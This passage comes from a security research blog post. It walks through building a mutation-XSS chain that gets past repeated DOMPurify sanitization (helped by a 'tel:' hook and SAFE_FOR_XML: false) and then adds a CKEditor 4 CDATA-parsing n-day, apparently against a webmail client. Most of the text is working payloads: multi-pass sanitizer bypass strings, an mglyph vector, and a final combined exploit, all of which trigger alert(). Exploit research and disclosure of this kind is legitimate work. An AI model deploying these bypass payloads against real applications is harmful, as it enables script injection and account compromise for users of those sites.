      <span class="k">if </span><span class="p">(</span><span class="dl">"</span><span class="s2">target</span><span class="dl">"</span> <span class="o">!==</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">_blank</span><span class="dl">"</span> <span class="o">!==</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span><span class="p">)</span> <span class="p">{</span>                                              
          <span class="k">if </span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">editorRegex</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span><span class="p">)</span> <span class="o">||</span> <span class="k">this</span><span class="p">.</span><span class="nx">editorRegex</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span><span class="p">))</span>
              <span class="nx">data</span><span class="p">.</span><span class="nx">keepAttr</span> <span class="o">=</span> <span class="o">!</span><span class="mi">1</span><span class="p">;</span>                                                                                   
          <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">element</span> <span class="k">instanceof</span> <span class="nx">HTMLElement</span> <span class="o">&amp;&amp;</span> <span class="dl">"</span><span class="s2">style</span><span class="dl">"</span> <span class="o">===</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span><span class="p">.</span><span class="nf">toLowerCase</span><span class="p">())</span>                     
              <span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">cssSanitizer</span><span class="p">.</span><span class="nf">sanitizeStyle</span><span class="p">(</span><span class="nx">element</span><span class="p">.</span><span class="nx">style</span><span class="p">);</span>
          <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="dl">"</span><span class="s2">href</span><span class="dl">"</span> <span class="o">===</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span> <span class="o">&amp;&amp;</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">:</span><span class="dl">"</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
              <span class="kd">var</span> <span class="nx">protocol</span> <span class="o">=</span> <span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span> <span class="o">||</span> <span class="dl">""</span><span class="p">).</span><span class="nf">toLowerCase</span><span class="p">().</span><span class="nf">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">:</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span>
              <span class="k">if </span><span class="p">([</span><span class="dl">"</span><span class="s2">tel</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">fax</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">sip</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">mailto</span><span class="dl">"</span><span class="p">].</span><span class="nf">includes</span><span class="p">(</span><span class="nx">protocol</span><span class="p">))</span>
                  <span class="k">return</span> <span class="k">void </span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">forceKeepAttr</span> <span class="o">=</span> <span class="o">!</span><span class="mi">0</span><span class="p">)</span>
          <span class="p">}</span>
      <span class="p">}</span> 
</code></pre></div></div>

<p>In case the <code class="language-plaintext highlighter-rouge">href</code> attribute value contained any of these protocols it would set the <code class="language-plaintext highlighter-rouge">forceKeepAttr</code> property to true.</p>

<p>It means something like this will remain untouched when passed through DOMPurify, otherwise without this misconfiguration the <code class="language-plaintext highlighter-rouge">href</code> attribute would have been removed.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"tel:&lt;/style&gt;&lt;img src=x onerror=alert(1)&gt;"</span><span class="nt">&gt;&lt;/a&gt;</span>
</code></pre></div></div>

<p>In such scenario the below payload would provide us with a full bypass.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mi">503</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">dirty</span> <span class="o">=</span> <span class="s2">`
</span><span class="p">${</span><span class="dl">"</span><span class="s2">&lt;r&gt;</span><span class="dl">"</span><span class="p">.</span><span class="nf">repeat</span><span class="p">(</span><span class="nx">n</span><span class="p">)}</span><span class="s2"> &lt;a&gt;&lt;svg&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;a&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;/image&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/a&gt;&lt;/image&gt;
&lt;style&gt;&lt;a href="tel:&lt;/style&gt;&lt;img src=x onerror=alert(1)&gt;"&gt;&lt;/a&gt;&lt;/style&gt;
&lt;/svg&gt;&lt;/desc&gt;&lt;/svg&gt;&lt;/a&gt;
`</span><span class="p">;</span>

<span class="c1">//assume the same hooks are configured and it is using 3.1.5 dompurify version</span>

<span class="kd">var</span> <span class="nx">clean</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">dirty</span><span class="p">)</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">clean</span>
</code></pre></div></div>

<p>But on the target this didn’t work, the onerror attribute was removed this left me wondering if there was another sanitizer in place? I checked again and realised DOMPurify is called one more time ah. This behaviour is actually where DOMPurify is run more than once assuming it would catch any bypass attempt as well which were bypassed in the first call.</p>

<p>But worry not Mizu again has our back, in the first blog where he disclosed all the bypasses there is a case of Mermaid as well. Mermaid deals with arbitrary html and in order to protect against xss they do similar things where they call DOMPurify more than once.</p>

<p>Here you can see the bypass payload taken from the blog, where DOMPurify is called two times.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mi">503</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">dirty</span> <span class="o">=</span> <span class="s2">`
</span><span class="p">${</span><span class="dl">"</span><span class="s2">&lt;form&gt;&lt;h1&gt;&lt;/form&gt;&lt;table&gt;&lt;form&gt;&lt;/form&gt;&lt;/table&gt;&lt;/form&gt;&lt;/table&gt;&lt;/h1&gt;&lt;/form&gt;</span><span class="se">\n</span><span class="dl">"</span><span class="p">.</span><span class="nf">repeat</span><span class="p">(</span><span class="nx">n</span><span class="p">)}</span><span class="s2">
&lt;a&gt;
    &lt;svg&gt;
        &lt;desc&gt;
            &lt;svg&gt;
                &lt;image&gt;
                    &lt;a&gt;
                        &lt;desc&gt;
                            &lt;svg&gt;
                                &lt;image&gt;&lt;/image&gt;
                            &lt;/svg&gt;
                        &lt;/desc&gt;
                    &lt;/a&gt;
                &lt;/image&gt;
                &lt;title&gt;&lt;a id="&lt;/title&gt;&lt;img src=x onerror=alert(1)&gt;"&gt;&lt;/a&gt;&lt;/title&gt;
            &lt;/svg&gt;
        &lt;/desc&gt;
    &lt;/svg&gt;
&lt;/a&gt;
`</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">step1</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">dirty</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">step1</span><span class="p">);</span>
</code></pre></div></div>

<p>Cool so in the sandbox iframe content I could see the xss payload but here comes the twist when I clicked on the Reply button the value passed to CKEditor was the sanitized version so it meant DOMPurify was again being called here, I checked by setting breakpoints and yeah it was true it was going through 2 more iterations when the user clicks on reply button. So in total there were 4 iterations of DOMPurify sanitize call.</p>

<p>There was a lot of stuff happening, in the example code things look easy to spot but when you are dealing with real applications they don’t appear the same way always there will be a lot of irrelevant pieces it’s all about identifying the pattern by reducing the surrounding noise. I didn’t want to understand everything and was trying to find a quick win on this mail sanitizer.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">clean1</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">dirty</span><span class="p">)</span>                                                                                
<span class="nx">clean2</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean1</span><span class="p">)</span>                                                                               
<span class="nx">clean3</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean2</span><span class="p">)</span>                                                                               
<span class="nx">clean4</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean3</span><span class="p">)</span>                                                                               
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">clean4</span>
</code></pre></div></div>

<p>There was a challenge around very old version of DOMPurify from [@S1r1u5<em>](https://x.com/S1r1u5</em>). The only thing surprising about this challenge was DOMPurify was called 10 times.</p>

<div class="link-preview">
  <a href="https://x.com/S1r1u5_/status/1837431552676188491" target="_blank" rel="noopener">
    <div class="link-preview-content">
      <div class="link-preview-title">JavaScript is not available.</div>
      
      <div class="link-preview-description">We’ve detected that JavaScript is disabled in this browser. Please enable JavaScript or switch to a supported browser to continue using x.com. You can see a list of supported browsers in our Help Center.</div>
      
      <div class="link-preview-domain">x.com</div>
    </div>
  </a>
</div>

<p>My solution to this was very simple, I just needed to hide my payload and have it mutate after the 10th iteration only</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa<span class="nt">&lt;math&gt;&lt;mtext&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;</span><span class="o">&lt;!</span><span class="nt">--&lt;/style&gt;&lt;a</span> <span class="na">id=</span><span class="s">"--&gt;&lt;mtext&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;&lt;/mglyph&gt;&lt;/table&gt;&lt;/style&gt;"</span><span class="nt">&gt;</span>
</code></pre></div></div>

<p>Mizu went overkill for this challenge :p and came up with a crazy vector
<img alt="image" src="/assets/images/mxss/5.png" /></p>

<p><br /></p>

<p>The way he smuggled the broken pieces of the payload half inside the attribute value and half inside the style content is super clever plus the arrangement of the style tag creativity at its peak. The base idea around this bypass is related to the parsing quirk for <code class="language-plaintext highlighter-rouge">mglyph</code> element.</p>

<div class="link-preview">
  <a href="https://web.archive.org/web/20220903190106/https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/" target="_blank" rel="noopener">
    
    <div class="link-preview-image">
      <img src="https://web.archive.org/web/20220903190106im_/https://research.securitum.com/wp-content/uploads/sites/2/2020/10/image-1-1024x104.png" alt="Mutation XSS via namespace confusion - DOMPurify &lt; 2.0.17 bypass - research.securitum.com" loading="lazy" />
    </div>
    
    <div class="link-preview-content">
      <div class="link-preview-title">Mutation XSS via namespace confusion - DOMPurify &lt; 2.0.17 bypass - research.securitum.com</div>
      
      <div class="link-preview-description">In this blogpost I’ll explain my recent bypass in DOMPurify – the popular HTML sanitizer library. In a nutshell, DOMPurify’s job is to take an untrusted HTML snippet, supposedly coming from an end-user, and remove all elements and attributes that can lead to Cross-Site Scripting (XSS). This is the bypass: Believe me that there’s not ...</div>
      
      <div class="link-preview-domain">web.archive.org</div>
    </div>
  </a>
</div>

<div class="link-preview">
  <a href="https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss" target="_blank" rel="noopener">
    
    <div class="link-preview-image">
      <img src="https://portswigger.net/content/images/logos/portswigger-twittercardlogo.png" alt="Bypassing DOMPurify again with mutation XSS" loading="lazy" />
    </div>
    
    <div class="link-preview-content">
      <div class="link-preview-title">Bypassing DOMPurify again with mutation XSS</div>
      
      <div class="link-preview-description">After seeing Michał Bentkowski's DOMPurify bypass and the resulting patch, I was inspired to try and crack the patched version myself. Looking at his vector I saw he used style with math based tags to</div>
      
      <div class="link-preview-domain">portswigger.net</div>
    </div>
  </a>
</div>

<p>I came up with the following payload to bypass 4 iterations of DOMPurify</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mi">503</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">dirty</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="dl">"</span><span class="s2">&lt;form&gt;&lt;h1&gt;&lt;/form&gt;&lt;table&gt;&lt;form&gt;&lt;/form&gt;&lt;/table&gt;&lt;/form&gt;&lt;/table&gt;&lt;/h1&gt;&lt;/form&gt;</span><span class="dl">"</span><span class="p">.</span><span class="nf">repeat</span><span class="p">(</span><span class="nx">n</span><span class="p">)}</span><span class="s2">&lt;a&gt;&lt;svg&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;a&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;/image&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/a&gt;&lt;/image&gt;&lt;style&gt;&lt;a href="tel:&lt;/style&gt;&lt;/form&gt;</span><span class="p">${</span><span class="dl">"</span><span class="s2">&lt;form&gt;&lt;h1&gt;&lt;/form&gt;&lt;table&gt;&lt;form&gt;&lt;/form&gt;&lt;/table&gt;&lt;/form&gt;&lt;/table&gt;&lt;/h1&gt;&lt;/form&gt;</span><span class="dl">"</span><span class="p">.</span><span class="nf">repeat</span><span class="p">(</span><span class="nx">n</span><span class="p">)}</span><span class="s2">&lt;a&gt;&lt;svg&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;a&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;/image&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/a&gt;&lt;/image&gt;&lt;style&gt;&lt;a href='tel:&lt;/style&gt;&lt;img src=x onerror=alert()&gt;'&gt;"&gt;&lt;/a&gt;&lt;/style&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/svg&gt;&lt;/a&gt;`</span><span class="p">;</span>

<span class="nx">clean1</span><span class="o">=</span><span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">dirty</span><span class="p">,{</span><span class="na">SAFE_FOR_XML</span><span class="p">:</span> <span class="kc">false</span><span class="p">})</span>
<span class="nx">clean2</span><span class="o">=</span><span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean1</span><span class="p">,{</span><span class="na">SAFE_FOR_XML</span><span class="p">:</span> <span class="kc">false</span><span class="p">})</span>
<span class="nx">clean3</span><span class="o">=</span><span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean2</span><span class="p">,{</span><span class="na">SAFE_FOR_XML</span><span class="p">:</span> <span class="kc">false</span><span class="p">})</span>
<span class="nx">clean4</span><span class="o">=</span><span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean3</span><span class="p">,{</span><span class="na">SAFE_FOR_XML</span><span class="p">:</span> <span class="kc">false</span><span class="p">})</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span><span class="o">=</span><span class="nx">clean4</span>
</code></pre></div></div>

<p>The base idea for this payload is the same as Mizu’s which he used to bypass two iterations of DOMPurify, I have only included the same payload one more time inside of the attribute to bypass four iterations. I was doing this testing on a local setup as that was easier.</p>

<p>As I had a successful bypass now for DOMPurify I moved on to CKEditor to reverse engineer the POC for the past advisory</p>

<h1 id="reverse-engineering-the-ckeditor-n-day">Reverse Engineering the CKEditor N-Day</h1>

<div class="link-preview">
  <a href="https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm" target="_blank" rel="noopener">
    <div class="link-preview-content">
      <div class="link-preview-title">Cross-site scripting (XSS) vulnerability caused by incorrect CDATA detection</div>
      
      <div class="link-preview-description">GitHub is where people build software. More than 150 million people use GitHub to discover, fork, and contribute to over 420 million projects.</div>
      
      <div class="link-preview-domain">github.com</div>
    </div>
  </a>
</div>

<p><em>A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. It affects all users using the CKEditor 4 at version &lt; 4.24.0-lts.</em></p>

<p>Looking into the Mail to see how CKEditor is implemented I could see the first argument is supposed to be the element selector and the second argument contains the json config one thing to note here was that it had this <code class="language-plaintext highlighter-rouge">extraAllowedContent: style</code> which allows style elements otherwise in default config this is removed.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">this</span><span class="p">.</span><span class="nx">editor</span> <span class="o">=</span> <span class="nx">CKEDITOR</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="nx">c</span><span class="p">,</span> <span class="nx">f</span><span class="p">)</span>
</code></pre></div></div>

<p>Based on the Advisory it was fixed in version 4.24.0-lts, so we will start by <a href="https://github.com/ckeditor/ckeditor4/compare/4.23.0-lts...4.24.0-lts">diffing the previous version</a></p>

<p>Easily found the commit related to it <em>Fix CDATA parsing logic</em>. I setup some breakpoints around it and started playing with the code changes.</p>

<p>The parsing for CDATA alone is happening <a href="https://github.com/ckeditor/ckeditor4/blob/c7e59ec199298b6b23f4aa7a7668f18572385bac/core/htmlparser/cdata.js#L27C2-L27C27">here</a></p>

<p>Ryotak has a nice writeup around CDATA parsing logics which allowed him to bypass DOMPurify</p>

<div class="link-preview">
  <a href="https://flatt.tech/research/posts/bypassing-dompurify-with-good-old-xml/" target="_blank" rel="noopener">
    
    <div class="link-preview-image">
      <img src="https://flatt.tech/research/bypassing-dompurify-with-good-old-xml-thumbnail.png" alt="Bypassing DOMPurify with good old XML" loading="lazy" />
    </div>
    
    <div class="link-preview-content">
      <div class="link-preview-title">Bypassing DOMPurify with good old XML</div>
      
      <div class="link-preview-description">How I could bypass DOMPurify with XML</div>
      
      <div class="link-preview-domain">flatt.tech</div>
    </div>
  </a>
</div>

<p>Directly testing it on a local setup was much easier than focusing too much on the source, as the advisory comments had some mentioning around STYLE I tried playing around embedding CDATA blocks inside of it. My focus was if I can hide the closing style tag inside of CDATA which will allow me to hide a payload that gets missed by the CKEditor sanitizer, but when parsed by the browser the hidden payload comes into action.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>shirley <span class="nt">&lt;style&gt;</span><span class="o">&lt;![</span><span class="nt">CDATA</span><span class="o">[</span> <span class="nt">h1</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span><span class="nt">&lt;/style&gt;</span>testinggg }]]&gt;<span class="nt">&lt;/style&gt;</span> // input
shirley <span class="nt">&lt;style </span><span class="na">type=</span><span class="s">"text/css"</span><span class="nt">&gt;</span> <span class="nt">testinggg</span> <span class="err">}</span><span class="o">]]&amp;</span><span class="nt">gt</span><span class="o">;</span> <span class="nt">&lt;/style&gt;</span>  // output
</code></pre></div></div>

<p>By setting a breakpoint on this line <code class="language-plaintext highlighter-rouge">this.onCDATA( cdata.join( '' ) )</code> I could see what all is parsed as CDATA block. In the screenshot you can see the array <code class="language-plaintext highlighter-rouge">h</code> containing all the parts.</p>

<p><img alt="image" src="/assets/images/mxss/6.png" /></p>

<p><br /></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>shirley <span class="nt">&lt;style&gt;</span><span class="o">&lt;![</span><span class="nt">CDATA</span><span class="o">[</span><span class="nt">h1</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span><span class="nt">&lt;/style&gt;</span> <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span> aaaaaaaaaaaaaaaaaaaaaaa  <span class="nt">&lt;style&gt;</span> <span class="err">}</span><span class="o">]]&gt;</span> <span class="nt">&lt;/style&gt;</span>
</code></pre></div></div>

<p><img alt="image" src="/assets/images/mxss/7.png" /></p>

<p><br /></p>

<p>In the fixed version the same input produces a different output</p>

<p><img alt="image" src="/assets/images/mxss/8.png" /></p>

<p><br /></p>

<p>So what happened here let me explain, first let’s see how the same gets parsed by the Browser</p>

<iframe style="width:100%; height:500px; border:1px solid #333; border-radius:8px;" sandbox="allow-scripts allow-modals allow-popups allow-same-origin" src="https://yeswehack.github.io/Dom-Explorer/frame?input=editable&amp;titleBar=readonly&amp;readonly=true&amp;pipe[titleBar]=true&amp;pipe[settings]=true&amp;pipe[render]=true&amp;pipe[skip]=true#eyJpbnB1dCI6InNoaXJsZXkgPHN0eWxlPjwhW0NEQVRBW2gxIHsgY29sb3I6IHJlZDs8L3N0eWxlPiA8aW1nIHNyYz14IG9uZXJyb3I9YWxlcnQoKT4gYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWEgIDxzdHlsZT4gfV1dPiA8L3N0eWxlPiIsInBpcGVsaW5lcyI6W3siaWQiOiJpaG9kM2M4dCIsIm5hbWUiOiJEb20gVHJlZSIsInBpcGVzIjpbeyJuYW1lIjoiRG9tUGFyc2VyIiwiaWQiOiJkNHNpMzdjZyIsImhpZGUiOmZhbHNlLCJza2lwIjpmYWxzZSwib3B0cyI6eyJ0eXBlIjoidGV4dC9odG1sIiwic2VsZWN0b3IiOiJib2R5Iiwib3V0cHV0IjoiaW5uZXJIVE1MIiwiYWRkRG9jdHlwZSI6dHJ1ZX19XX1dfQ=="></iframe>

<p>This is what the browser sees (newline denotes the end of each element), I have already explained about the STYLE element in the starting of the blogpost</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;style&gt;</span><span class="o">&lt;![</span><span class="nt">CDATA</span><span class="o">[</span><span class="nt">h1</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span><span class="nt">&lt;/style&gt;</span>
<span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span> aaaaaaaaaaaaaaaaaaaaaaa
<span class="nt">&lt;style&gt;</span> <span class="err">}</span><span class="o">]]&gt;</span> <span class="nt">&lt;/style&gt;</span>
</code></pre></div></div>

<p>And this is what the CKEditor HTML parser sees, when parsing CDATA block CKEditor doesn’t take into account the closing STYLE tag it just looks for the closing CDATA block <code class="language-plaintext highlighter-rouge">]]&gt;</code> and consumes everything that comes in between:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;style&gt;</span>
<span class="o">&lt;![</span><span class="nt">CDATA</span><span class="o">[</span><span class="nt">h1</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span><span class="nt">&lt;/style&gt;</span> <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span> aaaaaaaaaaaaaaaaaaaaaaa  <span class="nt">&lt;style&gt;</span> <span class="err">}</span><span class="o">]]&gt;</span> 
<span class="nt">&lt;/style&gt;</span>
</code></pre></div></div>

<p>This creates a parser discrepancy between the CKEditor HTML parser and how the browser parses the same HTML, the core fundamental of any mutation bug is to find exactly this kind of discrepancy. The <code class="language-plaintext highlighter-rouge">&lt;img&gt;</code> tag which CKEditor thinks is harmless CDATA content sitting inside style will actually be rendered as active HTML by the browser. We have our CKEditor XSS also now</p>

<p><img alt="image" src="/assets/images/mxss/9.png" /></p>

<p><br /></p>

<h1 id="the-final-chain">The Final Chain</h1>

<p>We are getting closer to our goal, to summarise we tested out our bypass locally for DOMPurify which works with bypassing four iterations of DOMPurify sanitize plus we also now have the CKEditor n-day poc. Now we just need to place the CKEditor payload inside our DOMPurify bypass.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mi">503</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">dirty</span> <span class="o">=</span> <span class="s2">`aaaaaaaaaaaaaaaaaaa</span><span class="p">${</span><span class="dl">"</span><span class="s2">&lt;form&gt;&lt;h1&gt;&lt;/form&gt;&lt;table&gt;&lt;form&gt;&lt;/form&gt;&lt;/table&gt;&lt;/form&gt;&lt;/table&gt;&lt;/h1&gt;&lt;/form&gt;</span><span class="dl">"</span><span class="p">.</span><span class="nf">repeat</span><span class="p">(</span><span class="nx">n</span><span class="p">)}</span><span class="s2">&lt;a&gt;&lt;svg&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;a&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;/image&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/a&gt;&lt;/image&gt;&lt;style&gt;&lt;a href="tel:&lt;/style&gt;&lt;/form&gt;</span><span class="p">${</span><span class="dl">"</span><span class="s2">&lt;form&gt;&lt;h1&gt;&lt;/form&gt;&lt;table&gt;&lt;form&gt;&lt;/form&gt;&lt;/table&gt;&lt;/form&gt;&lt;/table&gt;&lt;/h1&gt;&lt;/form&gt;</span><span class="dl">"</span><span class="p">.</span><span class="nf">repeat</span><span class="p">(</span><span class="nx">n</span><span class="p">)}</span><span class="s2">&lt;a&gt;&lt;svg&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;a&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;/image&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/a&gt;&lt;/image&gt;&lt;style id=jj&gt;&lt;a href='tel:&lt;/style&gt;shirley &lt;style&gt;&lt;![CDATA[h1 { color: red;&lt;/style&gt; &lt;img src=x onerror=alert()&gt; aaaaaaaaaaaaaaaaaaaaaaa  &lt;style&gt; }]]&gt; &lt;/style&gt;'&gt;"&gt;&lt;/a&gt;&lt;/style&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/svg&gt;&lt;/a&gt;`</span><span class="p">;</span>
  <span class="kd">var</span> <span class="nx">clean</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">dirty</span><span class="p">);</span>
  <span class="kd">var</span> <span class="nx">clean1</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean</span><span class="p">);</span>
  <span class="kd">var</span> <span class="nx">clean2</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean1</span><span class="p">);</span>
  <span class="kd">var</span> <span class="nx">clean3</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">clean2</span><span class="p">);</span>
  <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">clean3</span><span class="p">);</span>

  <span class="c1">// Load sanitized HTML into CKEditor</span>
  <span class="nx">CKEDITOR</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">instanceReady</span><span class="dl">'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">evt</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">evt</span><span class="p">.</span><span class="nx">editor</span><span class="p">.</span><span class="nf">setData</span><span class="p">(</span><span class="nx">clean3</span><span class="p">);</span>
  <span class="p">});</span>
  <span class="nx">CKEDITOR</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="dl">'</span><span class="s1">editor</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span><span class="na">extraAllowedContent</span><span class="p">:</span> <span class="dl">'</span><span class="s1">style</span><span class="dl">'</span><span class="p">});</span>
</code></pre></div></div>

<p><img alt="image" src="/assets/images/mxss/10.png" /></p>

<p><br /></p>

<p>The only change I made was here, inside the attribute value you can see it contains the CKEditor payload which I demonstrated just above.</p>

